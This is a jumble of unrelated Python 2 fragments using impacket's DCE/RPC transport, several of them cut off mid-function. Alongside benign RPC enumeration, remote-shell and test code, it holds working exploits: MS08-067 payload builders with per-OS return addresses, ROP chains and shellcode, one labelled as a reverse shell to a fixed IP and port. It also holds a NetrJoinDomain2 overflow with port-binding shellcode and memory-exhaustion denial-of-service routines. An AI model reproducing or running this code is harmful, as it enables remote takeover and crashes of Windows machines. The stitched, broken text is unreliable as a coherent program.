def __DCEPacket(self):
if (self.os=='1'):
print 'Windows XP SP0/SP1 Universal\n'
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif (self.os=='2'):
print 'Windows 2000 Universal\n'
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif (self.os=='3'):
print 'Windows 2003 SP0 Universal\n'
ret = "\x9e\x12\x00\x01" #0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif (self.os=='4'):
print 'Windows 2003 SP1 English\n'
ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
elif (self.os=='5'):
print 'Windows XP SP3 French (NX)\n'
ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='6'):
print 'Windows XP SP3 English (NX)\n'
ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='7'):
print 'Windows XP SP3 English (AlwaysOn NX)\n'
rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case.
else:
print 'Not supported OS version\n'
sys.exit(-1)
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self, addr):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s..." % protocol
print "Creating service %s..." % self.__serviceName
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
if self.__mode == 'SERVER':
serverThread = SMBServer()
serverThread.daemon = True
serverThread.start()
self.shell = RemoteShell(self.__share, rpctransport, self.__mode)
self.shell.cmdloop()
if self.__mode == 'SERVER':
serverThread.stop()
except Exception, e:
raise
print e
sys.stdout.flush()
sys.exit(1)
def run(self, addr, smbcmd):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "\n\n [*] Trying protocol " + protocol + " on " + addr
print " [*] Creating service %s..." % self.__serviceName
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
try:
# create the object to execute our command
self.executor = SmbExecute(self.__share, rpctransport,
self.__mode, self.__serviceName,
self.__outputfile)
# actually execute the command
out = self.executor.execute_remote(smbcmd)
# return the output
return out
except (Exception, KeyboardInterrupt), e:
print e
sys.stdout.flush()
return ""
def dump(self, addr):
"""Dumps the list of endpoints registered with the mapper
listening at addr. Addr is a valid host name or IP address in
string format.
"""
print 'Retrieving endpoint list from %s' % addr
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = RPCDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s..." % protocol
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password)
try:
entries = self.__fetchList(rpctransport)
except Exception, e:
print 'Protocol failed: %s' % e
else:
# Got a response. No need for further iterations.
break
def dump(self, addr):
print 'Brute forcing SIDs at %s' % addr
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = LSALookupSid.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s..." % protocol
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
try:
entries = self.__bruteForce(rpctransport, self.__maxRid)
except Exception, e:
print 'Protocol failed: %s' % str(e)
raise
else:
# Got a response. No need for further iterations.
break
def play(self, addr):
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s..." % protocol
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
try:
self.doStuff(rpctransport)
except Exception, e:
print 'Protocol failed: %s' % e
else:
# Got a response. No need for further iterations.
break
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory(
'ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(
uuid.uuidtup_to_bin(
('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub = '\x01\x00\x00\x00'
self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub += shellcode
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub += payload
self.__stub += '\x00\x00\x00\x00'
self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub += '\x01\x00\x00\x00'
return
def run(self, addr):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
color.echo("[*] Trying protocol %s..." % protocol, GREEN)
color.echo("[*] Creating service %s..." % self.__serviceName,
GREEN)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
try:
self.shell = RemoteShell(self.__share, rpctransport,
self.__mode)
self.shell.cmdloop()
except Exception, e:
color.echo("[!] %s" % e, RED)
def main(args):
if len(args) != 4:
print "usage: opdump.py hostname port interface version"
return 1
host, port, interface, version = args[0], int(args[1]), args[2], args[3]
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
results = []
for i in range(256):
dce = trans.get_dce_rpc()
dce.connect()
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
dce.call(i, "")
try:
resp = dce.recv()
except dcerpc.Exception, e:
result = str(e)
else:
result = "success"
dce.disconnect()
results.append(result)
def __DCEPacket(self):
print '[-]Initiating connection'
try:
self.__trans = transport.DCERPCTransportFactory(
'ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
except Exception, e:
print "\n Something went wrong. Might not be vulnerable..\n Printing error: " + str(
e) + "\n\n Returning to exploits menu..."
def setupConnection(self):
proto = int(self.params['proto'])
self.params['port'] = int(self.params['port'])
stringbinding = self.protocols[proto]
stringbinding %= self.params
print "Using stringbinding: %r" % stringbinding
self.trans = transport.DCERPCTransportFactory(stringbinding)
self.trans.set_max_fragment_size(int(self.params['transport_frag']))
self.trans.set_dport(int(self.params['port']))
try:
# SMB parameters handling
self.trans.setup_smb_server()
# force building the SMB object so we can change its methods
self.smb = self.trans.get_smb_server()
# select the right tree_connect
arg = int(self.params['tree_connect'])
if arg == 0: self.smb.tree_connect_andx = self.smb.tree_connect
if arg == 1:
self.smb.tree_connect_andx = self.smb.tree_connect_andx
# open selection
arg = int(self.params['open'])
if arg == 0: self.smb.nt_create_andx = self.open
elif arg == 1: self.smb.nt_create_andx = self.open_andx
# read selection
arg = int(self.params['read'])
if arg == 0: self.smb.read_andx = self.smb.read
elif arg == 1: self.smb.read_andx = self.smb.read_andx
elif arg == 2: self.smb.read_andx = self.smb.read_raw
elif arg == 3:
self.smb.original_read_andx = self.smb.read_andx
self.smb.read_andx = self.read_cycling
# write selection
arg = int(self.params['write'])
if arg == 0: self.smb.write_andx = self.smb.write
elif arg == 1: self.smb.write_andx = self.smb.write_andx
elif arg == 2: self.smb.write_andx = self.smb.write_raw
elif arg == 3:
self.smb.original_write_andx = self.smb.write_andx
self.smb.write_andx = self.write_cycling
# smb credentials
self.trans.set_credentials(self.params['smb_user'],
self.params['smb_passwd'],
lm_hash=self.params['smb_lmhash'],
nt_hash=self.params['smb_nthash'])
except Exception, e:
pass
def main(args):
if len(args) != 2:
print "usage: ./ifmap.py <host> <port>"
return 1
host = args[0]
port = int(args[1])
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
iid = uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0"))
dce.bind(iid)
dcemgmt = mgmt.DCERPCMgmt(dce)
ifids = dcemgmt.inq_if_ids()
uuidtups = set(
uuid.bin_to_uuidtup(ifids.get_if_binuuid(index))
for index in range(ifids.get_ifcount())
)
dce.disconnect()
probes = uuidtups | uuid_database
for tup in sorted(probes):
listed = tup in uuidtups
dce.connect()
binuuid = uuid.uuidtup_to_bin(tup)
try:
dce.bind(binuuid)
except dcerpc.Exception, e:
resp = dcerpc.MSRPCBindAck(str(e.args[1]))
if (resp.getCtxItem(1)['Result'], resp.getCtxItem(1)['Reason']) == (2, 1):
listening = False
else:
raise
else:
listening = True
listed = tup in uuidtups
otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
if listed or listening:
print "%r: %s, %s" % (
tup,
"listed" if listed else "other version listed" if otherversion else "not listed",
"listening" if listening else "not listening"
)
def test_connection(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
rpctransport.set_dport(self.dport)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(epm.MSRPC_UUID_PORTMAP)
dce.disconnect()
def __connect(self):
'''
SMB connect to the Computer Browser service named pipe
Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html
'''
try:
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
except smb.SessionError, _:
raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
def test_connectionHashes(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
rpctransport.set_dport(self.dport)
if hasattr(rpctransport, 'set_credentials'):
lmhash, nthash = self.hashes.split(':')
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, '', self.domain,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(epm.MSRPC_UUID_PORTMAP)
dce.disconnect()
def test_dceFragmentation(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
rpctransport.set_dport(self.dport)
if hasattr(rpctransport, 'set_credentials'):
lmhash, nthash = self.hashes.split(':')
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, '', self.domain,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.set_max_fragment_size(1)
dce.set_credentials(*(rpctransport.get_credentials()))
dce.connect()
dce.bind(epm.MSRPC_UUID_PORTMAP)
rpcepm = epm.DCERPCEpm(dce)
resp = rpcepm.lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
dce.disconnect()
def test_packetAnonWINNTPacketPrivacy(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
rpctransport.set_dport(self.dport)
if hasattr(rpctransport, 'set_credentials'):
lmhash, nthash = self.hashes.split(':')
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_max_fragment_size(1)
dce.connect()
dce.set_auth_type(dcerpc.RPC_C_AUTHN_WINNT)
dce.set_auth_level(dcerpc.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.bind(epm.MSRPC_UUID_PORTMAP)
rpcepm = epm.DCERPCEpm(dce)
resp = rpcepm.lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
dce.disconnect()
def run(self, addr):
for protocol in self.__protocols:
protodef = PSEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s...\n" % protocol
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
#if hasattr(rpctransport,'preferred_dialect'):
# rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password,
self.__domain, self.__lmhash,
self.__nthash)
self.doStuff(rpctransport)
def run(self):
self.gom.echo()
self.gom.echo("Trying to exploit ...")
self.gom.echo()
pipe = 'browser'
UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')
host = self.target
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {'host': host, 'pipe': pipe}
MB = 1024 * 1024
if self.wizard:
res = raw_input("Memory size [1024]: ")
if res != "":
self.memorySize = int(res)
memory_size = MB * self.memorySize
query = NetrWkstaUserEnum()
server = "%s\x00" % (host)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(server)
query['server']['max'] = len(server)
query['server']['str'] = utf16(server)
query['max_len'] = memory_size
trans = transport.DCERPCTransportFactory(stringbinding)
self.gom.echo("[*] Connecting to %s:445 (NULL Session)" %
(self.target))
try:
trans.connect()
except Exception, err:
self.gom.echo("[-] %s" % (err))
return False
from impacket.dcerpc import transport
import sys
####################################
# MS08_067 case of study by ly0n
# Greetz: muts,ryujin & offsec team
####################################
try:
target = sys.argv[1]
port = 445
except IndexError:
print "Usage: program host"
sys.exit()
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' %
target)
trans.connect()
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# revere shell 192.168.11.5 port 777 by msfpayload
payload = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f"
def run(self):
self.gom.echo()
self.gom.echo("Trying to exploit ...")
self.gom.echo()
MB = 1024 * 1024
host = self.target
if self.wizard:
res = raw_input("Memory size [1024]: ")
if res != "":
self.memorySize = int(res)
memory_size = MB * self.memorySize
interface = ('spoolss', '12345678-1234-abcd-ef00-0123456789ab', '1.0')
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {
'host': host,
'pipe': interface[0],
}
trans = transport.DCERPCTransportFactory(stringbinding)
self.gom.echo("[*] Connecting to %s:445" % (host))
try:
trans.connect()
except:
self.gom.echo("[-] Connect failed")
return False
self.gom.echo("[+] Connected")
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))
query = OpenPrinterEx()
printer = "\\\\%s\x00" % (host)
query['printer'] = B1()
query['printer']['id'] = 0x41414141
query['printer']['max'] = len(printer)
query['printer']['actual'] = len(printer)
query['printer']['str'] = printer.encode('utf_16_le')
client = "\\\\h07\x00"
query['client'] = B2()
query['client']['max'] = len(client)
query['client']['actual'] = len(client)
query['client']['str'] = client.encode('utf_16_le')
user = "******"
query['user'] = B2()
query['user']['max'] = len(user)
query['user']['actual'] = len(user)
query['user']['str'] = user.encode('utf_16_le')
dce.call(query.opnum, query)
raw = dce.recv()
handle = raw[:20]
if (handle == ("\x00" * 20)):
self.gom.echo("[-] ERR: OpenPrinterEx()")
if (raw[20:] == "\x09\x07\x00\x00"):
self.gom.echo(
"[-] Return code: Invalid printer name (0x00000709)")
if (raw[20:] == "\x05\x00\x00\x00"):
self.gom.echo("[-] Return code: Access denied (0x00000005)")
return False
query = GetPrinterData()
value = "blah_blah\x00"
query['handle'] = handle
query['value'] = B2()
query['value']['max'] = len(value)
query['value']['actual'] = len(value)
query['value']['str'] = value.encode('utf_16_le')
query['offered'] = memory_size
dce.call(query.opnum, query)
try:
raw = dce.recv()
status = raw[:4]
r_size = raw[4:8]
if (status == "\x1b\x00\x00\x1c"):
self.gom.echo("[-] Memory allocation error, out of memory")
return True
if (r_size == pack("<L", memory_size)):
self.gom.echo("[+] Memory allocated!")
except NetBIOSTimeout, err:
self.gom.echo("[+] %s" % (err))
self.gom.echo("[+] %s: Out of memory" % (host))
def DCEconnectAndExploit(target, domain):
baselen = 3708
stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {
'host': target,
'pipe': 'wkssvc',
'port': 445,
}
print 'Connecting to named pipe (wkssvc)'
trans = transport.DCERPCTransportFactory(stringbinding)
trans.connect()
print 'Setting up DCE transport'
dce = trans.DCERPC_class(trans)
dce.bind(
uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')))
print 'Sending attack payload to target'
#NetrJoinDomain2 data: Hostname
query1 = "\xaa\xbb\xcc\xdd"
query1 += "\x07\x00\x00\x00"
query1 += "\x00\x00\x00\x00"
query1 += "\x07\x00\x00\x00"
query1 += "\x5C\x00\x5C\x00"
query1 += "\x41\x00\x55\x00"
query1 += "\x58\x00\x37\x00"
query1 += "\x00\x00\x00\x00"
#NetrJoinDomain2 data: Domain/Hostname
targetd = '\x00'.join(list(domain)) + '\x00'
Len = baselen + len(domain)
query2 = struct.pack('L', Len)
query2 += struct.pack('L', 0)
query2 += struct.pack('L', Len)
query2 += targetd
query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
query3 += "\x90\x90" * 1058
query3 += "\xEB\x06" #6 byte jump from current pointer in ebx
query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627)
#350 byte port binding shellcode
query3 += "\x90\x90\x90\x90\x90\x90"
query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
query3 += "\x90\x90" * 2467
query3 += "\x00\x00"
query3 += "\x00\x00\x00\x00"
query3 += "\x00\x00\x00\x00"
query3 += "\x00\x00\x00\x00"
query3 += "\x00\x00"
query3 += "\x01\x00\x00\x00"
query = query1 + query2 + query3
dce.call(0x16, query)
('null_pointer', '<L=0'),
('max_len', '<L'),
('referent_id2', '<L=0x43434343'),
('enumeration_handle', '<L=0x00000000'),
)
query = NetrWkstaUserEnum()
server = "%s\x00" % (host)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(server)
query['server']['max'] = len(server)
query['server']['str'] = utf16(server)
query['max_len'] = memory_size
trans = transport.DCERPCTransportFactory(stringbinding)
print "[*] Connecting to %s:445 (NULL Session)" % (host)
try:
trans.connect()
except Exception, err:
print "[-] %s" % (err)
exit()
print "[+] Connected"
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1])))
dce.call(query.opnum, query)
